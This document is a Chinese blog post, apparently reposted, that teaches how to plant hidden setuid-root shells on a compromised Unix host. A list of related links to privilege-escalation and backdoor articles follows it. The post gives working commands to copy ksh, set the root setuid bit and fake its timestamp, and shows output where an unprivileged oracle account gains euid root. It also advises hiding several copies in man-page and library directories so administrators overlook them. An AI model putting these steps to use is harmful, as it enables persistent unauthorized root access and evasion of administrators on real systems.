suid shell
在 /tmp 或者其他的目录下放置 suid shell。以后只要你运行这个,就会轻易得到根用户权限。
#cp /bin/ksh /tmp/.sh
#chown root:root /tmp/.sh
#chmod +s /tmp/.sh
当你运行/tmp/.sh时,
这里我们用ksh shell是因为ksh 可以suid.换成其他的shell也许可能不行,具体看各个主机的情况而定.一般我们使用ksh.我们使用的溢出用来获得root权限的,也一般是溢出后执行/bin/ksh.
$id
uid=1002(oracle) gid=1(other)
$/tmp/.sh
#
#id
uid=1002(oracle) gid=1(other) euid=0(root) egid=0(root)
我们又是root了.
当然,为了更加隐蔽,我们不能把suid shell 放在/tmp
因为它是很容易被发现的.
我们应该放在深层的目录里面.
比如:
/usr/X11/include/X11/
或者
/usr/lib/
等等
通常我做的是:
# mkdir /usr/lib/lib/ mkdir /usr/lib/lib/...
# cp /bin/ksh /usr/lib/lib/.../lib
# chown root:sys /usr/lib/lib/.../lib
# chmod 4555 /usr/lib/lib/.../lib
# touch -r /bin/ksh /usr/lib/lib/.../lib
一个简单的suid shell安放好了.
不过,大家不要学我,我们要放在最隐蔽的地方.我新建目录的隐藏效果不是最好的.
我们必须利用现有的目录来安放,并且这个目录要有很多其它的文件做掩护.
大家不防试试/usr/man/下的目录.
很少管理员会检查这里的.
比如:
/usr/man/man1/
/usr/man/manl/
等.
比如:
# cp /bin/ksh /usr/man/man1/ja.1
:)当然具体要看你自己琢磨一下了.我敢说不难,最好多放置几个suid shell 在不同的目录.这样即使管理员发现了一个,也还有另外一个.:)
转载于:https://blog.51cto.com/linkboy/300416
suid shell相关推荐
- ATTCK矩阵 linux系统安全实践
0×01 前言 MITRE在2013年推出了ATT&CK模型,根据真实的观察数据来描述和分类对抗行为.ATT&CK将已知攻击者行为转换为结构化列表,近两年来,也在安全行业中广受欢迎,涌 ...
- cve -2016-6663 mysql 本地提权
0x01 漏洞原文 翻译水平不高求轻喷 感觉作者在写文章的时候有些地方描述的也不是特别清楚,不过结合poc可以清晰理解漏洞利用过程 0x04漏洞利用过程总结给出了清晰的漏洞利用过程,结合poc食用效果 ...
- mysql cve 2016 3521_MySQL-based databases CVE -2016-6663 本地提权
@date: 2016/11/3 @author: dlive 0x01 漏洞原文 翻译水平不高求轻喷 感觉作者在写文章的时候有些地方描述的也不是特别清楚,不过结合poc可以清晰理解漏洞利用过程 0x ...
- mysql提权方式linux_Linux提权的几种常用方式
本文转载自微信公众号「Bypass」,作者Bypass .转载本文请联系Bypass公众号. 在渗透测试过程中,提升权限是非常关键的一步,攻击者往往可以通过利用内核漏洞/权限配置不当/root权限运行 ...
- linux 系统命令被后门修改_Linux、Windows权限维持常用后门学习总结
前言 在上周做的变种DDG挖矿木马-watchdogs应急响应中,攻击者使用了预加载来劫持ps.top等系统命令,没有提及具体的排查手段,借着这篇文章来详细解释下,并总结下Linux.Windows下 ...
- Linux 多个留后门姿势
https://www.anquanke.com/post/id/155943 在一次渗透中,成功获取某目标几台比较重要的机器,当时只想着获取脱库,结果动静太大被发现了,之前渗透并没太在意Linux维 ...
- 20194311姜晨昊Exp2-后门原理与实践
文章目录 20194311姜晨昊Exp2-后门原理与实践 一.实验基础 基础知识 后门的概念 常用后门工具 1.NC和Netcat 2.SoCat 3.Meterpreter 二.实验目标 三. 实验 ...
- Unix编程/应用问答中文版(转)
Unix编程/应用问答中文版 名称 -- Unix编程/应用问答中文版 版本 -- 0.04 ( 2003-10-09 外发版 ) 维护 -- 小四 <scz@nsfocus.com> 主 ...
- 各类后门整理!【白帽黑客必备生存技能】
Unix Bash 远控后门 简介 利用 Unix/Linux 自带的 Bash 和 Crond 实现远控功能,保持反弹上线到公网机器. 利用方法 先创建 /etc/xxxx 脚本文件(名字自己改), ...
最新文章
- 谁能搞定中国的文艺复兴,我就能搞定中国的政治改革
- 业务直通式管理,你真的了解吗?
- 通话录音_iOS14,通话录音终于来了!
- oracle product文件,快速修复Oracle参数文件的另类方法
- Eclipse上安装springsource-tool-suite
- 详解自动驾驶仿真框架OpenCDA: An Open Cooperative Driving Automation Framework Integrated with Co-Simulation
- 瞧!公务员的工作还可以这样干
- 最大子序和(Leetcode第53题)
- Linux产生僵尸进程和孤儿进程及区别
- OpenStack回顾和展望-2018
- 电脑qq浏览器怎么滚动截长图_电脑怎么快速截图?
- Android上使用OkHttp来实现断点下载(续传)
- Java基础系列1-Java语言概述
- 关于哔哩哔哩视频,音频合并(使用ffmpeg批量处理)
- 误删了计算机桌面回收站,不小心误删电脑回收站怎么恢复?
- php手机地图导航,PHP引用百度地图API制作一个地图导航
- 流利阅读 2019.1.23 Tech industry expo opens portal to tomorrow
- 关于UEFI引导的理解
- 女人四十学计算机有用吗,四十岁的女人,开始学做美容工作,有前途吗
- Excel应用技巧:合并单元格的排序
热门文章
- java线程泄露_面试官:小伙子先来说一下可能引起Java内存泄露的场景吧
- snippets vscode 配置_VSCode 利用 Snippets 设置超实用的代码块
- 2020年快手校招JAVA岗笔试第二题
- 第12章:项目采购管理-章节真题
- 页面缓存 ehcache(简单的)
- 笔记-高项案例题-2017年上-质量管理
- 审计 Linux 系统的操作行为的 5 种方案对比
- Winform中实现连接Mysql并获取所有表名
- Linux上怎样停止服务(jar包)、查看进程路径、关闭指定端口
- 信息系统项目管理师-论文专题(三)范围管理论文写作